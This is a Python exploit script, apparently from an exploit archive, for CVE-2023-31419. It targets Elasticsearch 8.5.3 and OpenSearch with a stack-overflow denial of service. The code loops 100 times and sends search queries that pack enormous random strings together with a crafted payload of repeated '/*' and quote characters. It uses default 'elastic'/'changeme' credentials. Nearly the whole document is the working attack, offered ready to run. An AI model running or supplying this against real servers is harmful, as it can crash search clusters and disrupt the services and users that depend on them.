Elasticsearch - StackOverflow DoS

1. # Exploit Author: TOUHAMI KASBAOUI
2. # Vendor Homepage: https://elastic.co/
3. # Version: 8.5.3 / OpenSearch
4. # Tested on: Ubuntu 20.04 LTS
5. # CVE : CVE-2023-31419
6. # Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
7.  
8. import requests
9. import random
10. import string
11.  
12. es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
13. index_name = '*'
14.  
15. payload = "/*" * 10000 + "\\" +"'" * 999
16.  
17. verify_ssl = False
18.  
19. username = 'elastic'
20. password = 'changeme'
21.  
22. auth = (username, password)
23.  
24. num_queries = 100
25.  
26. for _ in range(num_queries):
27.     symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
28.     search_query = {
29.         "query": {
30.             "match": {
31.                 "message": (symbols * 9000) + payload
32.             }
33.         }
34.     }
35.  
36.     print(f"Query {_ + 1} - Search Query:")
37.  
38.     search_endpoint = f'{es_url}/{index_name}/_search'
39.     response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
40.  
41.     if response.status_code == 200:
42.         search_results = response.json()
43.  
44.         print(f"Query {_ + 1} - Response:")
45.         print(search_results)
46.  
47.         total_hits = search_results['hits']['total']['value']
48.         print(f"Query {_ + 1}: Total hits: {total_hits}")
49.  
50.         for hit in search_results['hits']['hits']:
51.             source_data = hit['_source']
52.             print("Payload result: {search_results}")
53.     else:
54.         print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")
55.